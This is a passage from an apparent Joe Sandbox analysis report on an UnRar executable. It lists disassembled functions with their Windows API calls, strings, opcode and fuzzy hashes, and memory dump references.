                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: Library$FreeLoadVersion_invalid_parameter_noinfo_noreturn
                                                            • String ID: rarlng.dll
                                                            • API String ID: 2688500320-1675521814
                                                            • Opcode ID: 0ad8de6bebfdfd1964e1752b41a765ccf109df7457987d996abce62f4454f237
                                                            • Instruction ID: d7c01215b5535646248aba05cd2279187f9f6364279557292cc98bb53e98f6d7
                                                            • Opcode Fuzzy Hash: 0ad8de6bebfdfd1964e1752b41a765ccf109df7457987d996abce62f4454f237
                                                            • Instruction Fuzzy Hash: 9941A332A1AB85C2FB10EB15E44026EB364FB89790F914275EADD43BA9DF3CD546CB10
                                                            Function 00007FF7AACFE33C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 3194 7ff7aacfe33c-7ff7aacfe353 3195 7ff7aacfe356-7ff7aacfe37e 3194->3195 3196 7ff7aacfe380-7ff7aacfe384 3195->3196 3197 7ff7aacfe389-7ff7aacfe391 3195->3197 3198 7ff7aacfe412-7ff7aacfe41b 3196->3198 3199 7ff7aacfe393-7ff7aacfe396 3197->3199 3200 7ff7aacfe3a9 3197->3200 3198->3195 3202 7ff7aacfe421-7ff7aacfe436 3198->3202 3203 7ff7aacfe3a2-7ff7aacfe3a7 3199->3203 3204 7ff7aacfe398-7ff7aacfe3a0 3199->3204 3201 7ff7aacfe3ae-7ff7aacfe3bf GetStdHandle 3200->3201 3205 7ff7aacfe3c1-7ff7aacfe3ca GetFileType 3201->3205 3206 7ff7aacfe3cc 3201->3206 3203->3201 3204->3201 3207 7ff7aacfe3ce-7ff7aacfe3d0 3205->3207 3206->3207 3208 7ff7aacfe3d2-7ff7aacfe3dc 3207->3208 3209 7ff7aacfe3ef-7ff7aacfe405 3207->3209 3210 7ff7aacfe3e4-7ff7aacfe3e7 3208->3210 3211 7ff7aacfe3de-7ff7aacfe3e2 3208->3211 3209->3198 3212 7ff7aacfe407-7ff7aacfe40b 3209->3212 3210->3198 3213 7ff7aacfe3e9-7ff7aacfe3ed 3210->3213 3211->3198 3212->3198 3213->3198
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: FileHandleType
                                                            • String ID: @
                                                            • API String ID: 3000768030-2766056989
                                                            • Opcode ID: f3e7264861a9ac29b6bc2686cda94d827727d6c0fc44cd82d1f241d9f40e9471
                                                            • Instruction ID: ad019f7028fb47344812c6eaf9dcc1acd9949371c930669001962e5e8c5570a2
                                                            • Opcode Fuzzy Hash: f3e7264861a9ac29b6bc2686cda94d827727d6c0fc44cd82d1f241d9f40e9471
                                                            • Instruction Fuzzy Hash: BF21A423A19743C0FB645B2D94A413CA650EB85774B6A1375DAAE067E4CF38D486E314
                                                            Function 00007FF7AACD1938 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SHGetMalloc.SHELL32(?,00000000,?,00007FF7AACD239F), ref: 00007FF7AACD194F
                                                            • SHGetSpecialFolderLocation.SHELL32(?,00007FF7AACD239F,?,?,?,?,?,?,?,?,?,?,?,?,00001000,00007FF7AACD0E37), ref: 00007FF7AACD197A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: FolderLocationMallocSpecial
                                                            • String ID: WinRAR
                                                            • API String ID: 531188275-3970807970
                                                            • Opcode ID: f3af807f95675379bdc82ed4cd9a2cf9e3fc9a091f5582759017ac9cfa60aa1b
                                                            • Instruction ID: 46315f264a92a15b249ba26e698edcf3a3d1e5e6295517be4ea6b7badb8e3fd9
                                                            • Opcode Fuzzy Hash: f3af807f95675379bdc82ed4cd9a2cf9e3fc9a091f5582759017ac9cfa60aa1b
                                                            • Instruction Fuzzy Hash: 86116D2660AB46C5FF14AF26E4441B9A360EB86B98F861072EF4E477A5CF3CD446C720
                                                            Function 00007FF7AACB9FEC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: LoadString$fflushswprintf
                                                            • String ID: %d.%02d$AFUM
                                                            • API String ID: 1946543793-129172010
                                                            • Opcode ID: 18d0168ece5d6b75b683f51e54f7397ceaa9557a8b843644d4e337b63a1198d7
                                                            • Instruction ID: ea6c2dccdb363d795f8d42c5c135781d75ec013deedb1de534b9b39652779b9c
                                                            • Opcode Fuzzy Hash: 18d0168ece5d6b75b683f51e54f7397ceaa9557a8b843644d4e337b63a1198d7
                                                            • Instruction Fuzzy Hash: 0C21C821A1E386D5FB60B724E0503BEB350EF84744F8510B6E58E07AAACF2DE147C760
                                                            Function 00007FF7AACE2B70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: Thread$CreatePriority
                                                            • String ID: CreateThread failed
                                                            • API String ID: 2610526550-3849766595
                                                            • Opcode ID: 5351f55b076782964a4b6d63375db98aedcf30de5e877132b5b09bfdbf1c3021
                                                            • Instruction ID: e27d4167ba18678bb925c1cf671a889729dbbc5fc275bcd835cfacf1e262c3f3
                                                            • Opcode Fuzzy Hash: 5351f55b076782964a4b6d63375db98aedcf30de5e877132b5b09bfdbf1c3021
                                                            • Instruction Fuzzy Hash: 0F114931A1AA42D1FB10AB11E8402A9B360FB94784F9541B5EA9D0667DEF3CE547C760
                                                            Function 00007FF7AACC9C44 Relevance: 4.6, APIs: 3, Instructions: 114fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: CreateFile$_invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 2272807158-0
                                                            • Opcode ID: 4aba1e86be385e65c79a408794d3d97dac4502a4cfc2b7a9b184ead070cf99ec
                                                            • Instruction ID: 2b24082b8fce44597350d32d82ab59f5d42648125d40c0cb0f30d35cae4d0551
                                                            • Opcode Fuzzy Hash: 4aba1e86be385e65c79a408794d3d97dac4502a4cfc2b7a9b184ead070cf99ec
                                                            • Instruction Fuzzy Hash: 3641C072A09B81C2FB10AF15E444369A7A0FB85BB4F911374DBAD07AE5DF3DE4928710
                                                            Function 00007FF7AACF195C Relevance: 4.6, APIs: 3, Instructions: 102COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                            • String ID:
                                                            • API String ID: 3058843127-0
                                                            • Opcode ID: fb79d6c25e0bdfe08afbc3017e32946ea5b2f89927f67d5480b29cab2c649b3a
                                                            • Instruction ID: f512832c7f6151552cb0910022ef3a34ecd7b9452642a50734c49dccdd85b774
                                                            • Opcode Fuzzy Hash: fb79d6c25e0bdfe08afbc3017e32946ea5b2f89927f67d5480b29cab2c649b3a
                                                            • Instruction Fuzzy Hash: 99314C23A0A743C1FA14BB2594213FDA291AF45784FC640B5EB4E5B6F7DE2DA4078360
                                                            Function 00007FF7AACE7894 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: std::bad_alloc::bad_alloc
                                                            • String ID:
                                                            • API String ID: 1875163511-0
                                                            • Opcode ID: fa8dd897aaf09fb9e1741d7bb10286adae7597390d1d5603791360488aedc6f9
                                                            • Instruction ID: c12788c0b168bd5a3cb4a92bab60b756e647f75ffaa0ed9197812b445ff9b985
                                                            • Opcode Fuzzy Hash: fa8dd897aaf09fb9e1741d7bb10286adae7597390d1d5603791360488aedc6f9
                                                            • Instruction Fuzzy Hash: 3831B262A0A696D5FA35BB24E4443BCE3A0FF50784F950071D68C06AB9DF7CEA87D311
                                                            Function 00007FF7AACCC05C Relevance: 4.6, APIs: 3, Instructions: 62COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 1203560049-0
                                                            • Opcode ID: 2263ee8e5741a74bddf4c317ff22f125a35d347b12692b4a00c6e57a05a5bf50
                                                            • Instruction ID: 07930ea31196191eb7ed3a4f2d05f815f2906d9c81bb9bef95a8662d7105bc7a
                                                            • Opcode Fuzzy Hash: 2263ee8e5741a74bddf4c317ff22f125a35d347b12692b4a00c6e57a05a5bf50
                                                            • Instruction Fuzzy Hash: FA21FD32A0DB82C1FE10AF25E45526DA361FF88B94F815270EADD43AA5EF3CD542C714
                                                            Function 00007FF7AACCB148 Relevance: 4.6, APIs: 3, Instructions: 57COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 1203560049-0
                                                            • Opcode ID: 706bc9d09196f2c54207c572ec04221bb7fa86cd6111331e959b508104e50a65
                                                            • Instruction ID: 600368dc09a7500973fc2a9b576081a01e636b0a45ecb5b61125fb70dedbfb8e
                                                            • Opcode Fuzzy Hash: 706bc9d09196f2c54207c572ec04221bb7fa86cd6111331e959b508104e50a65
                                                            • Instruction Fuzzy Hash: EC217732A19781C1FA10AB25F45412EF361FB88BA4F915271EAED43AB9EF3CD542C714
                                                            Function 00007FF7AACBDC10 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetStdHandle.KERNEL32(?,?,?,00007FF7AACBDB96,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AACBDC16
                                                            • GetFileType.KERNELBASE(?,?,?,00007FF7AACBDB96,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AACBDC22
                                                            • GetConsoleMode.KERNELBASE(?,?,?,00007FF7AACBDB96,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AACBDC35
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: ConsoleFileHandleModeType
                                                            • String ID:
                                                            • API String ID: 4141822043-0
                                                            • Opcode ID: 113d8ab883689415ffec9caca415240b731e18cf40ca46f7d6615de057dcbef9
                                                            • Instruction ID: c93b385d3d6a83362e511956a1070acba43d057172490e9dff1885aa9d1d2a3e
                                                            • Opcode Fuzzy Hash: 113d8ab883689415ffec9caca415240b731e18cf40ca46f7d6615de057dcbef9
                                                            • Instruction Fuzzy Hash: 82E08C20E0AE03C6FA186B22A815139A390EFA9781B922070C86B4A725DE6C90868724
                                                            Function 00007FF7AACF710C Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            • Opcode ID: 97b066909d81c3c8936a554e507fdefb4e0de69599323732ab603ed74be015f5
                                                            • Instruction ID: 0ba77c2cf525eb3a897f5ed9cec29c375c213932c84aa19e89f6ebb6c0f45c00
                                                            • Opcode Fuzzy Hash: 97b066909d81c3c8936a554e507fdefb4e0de69599323732ab603ed74be015f5
                                                            • Instruction Fuzzy Hash: 96E01211B06746C2FF447B309C5127D63529F85741F4194B8C85F17366DE3DA45E4320
                                                            Function 00007FF7AACB2880 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 336COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID: R
                                                            • API String ID: 3668304517-1466425173
                                                            • Opcode ID: cc6b79eefe2e387b2ad9bb88ca01ba05a10dd57067dfc169f73f0482cee603a0
                                                            • Instruction ID: 86678bd30f3ee4fea22661539eafc7a1bf61c6c98313f019d6b77d8365647ff1
                                                            • Opcode Fuzzy Hash: cc6b79eefe2e387b2ad9bb88ca01ba05a10dd57067dfc169f73f0482cee603a0
                                                            • Instruction Fuzzy Hash: 14D1B562B0A781D1FB28AB25D6442BDE7A0FB05B80F850475CF5D477B5DF3AE4628320
                                                            Function 00007FF7AACFC2D4 Relevance: 3.8, APIs: 3, Instructions: 46COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast
                                                            • String ID:
                                                            • API String ID: 1452528299-0
                                                            • Opcode ID: 69bce8c8151a2d304abe4d4b1d04e1ea1ef8d1e7b7663c3934200712dfacf337
                                                            • Instruction ID: be79f1cef695e1493a3287e3edb5f6704f66372ffba41dce6e6154f0eb73f20b
                                                            • Opcode Fuzzy Hash: 69bce8c8151a2d304abe4d4b1d04e1ea1ef8d1e7b7663c3934200712dfacf337
                                                            • Instruction Fuzzy Hash: 4A119E22F0FB43C6FA5A7729652417EA151AF04BD0F8205B9D81E437EADE2CE8078320
                                                            Function 00007FF7AACBA6E4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: CommandLine
                                                            • String ID: AFUM
                                                            • API String ID: 3253501508-3109717258
                                                            • Opcode ID: 39069e2e094ec806a52da7b2eb67461e0e90091b1ff753187ba2f336ce6f0e97
                                                            • Instruction ID: c238e36e7b6df30875d85aeda530f43795c7da461ce53446c1dd039a01661e68
                                                            • Opcode Fuzzy Hash: 39069e2e094ec806a52da7b2eb67461e0e90091b1ff753187ba2f336ce6f0e97
                                                            • Instruction Fuzzy Hash: BA319D22E15B41D9FB10EBA0D4401EC77B0EB48BA8F961176DE9D23AA9DF38D547C320
                                                            Function 00007FF7AACCA2A8 Relevance: 3.1, APIs: 2, Instructions: 100COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFilePointer.KERNELBASE(?,?,?,00000000,?,00007FF7AACCA5DE,?,?,?,00007FF7AACD47A7), ref: 00007FF7AACCA3D9
                                                            • GetLastError.KERNEL32(?,00007FF7AACCA5DE,?,?,?,00007FF7AACD47A7), ref: 00007FF7AACCA3E8
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID:
                                                            • API String ID: 2976181284-0
                                                            • Opcode ID: e006a98f753282433694ae2ef84f848ae6f3492d77b08c245a1f38e856b72c4f
                                                            • Instruction ID: c9766471bfff471375433fdadc2c2358e23aac152e9e981a725df0dbabe4b57d
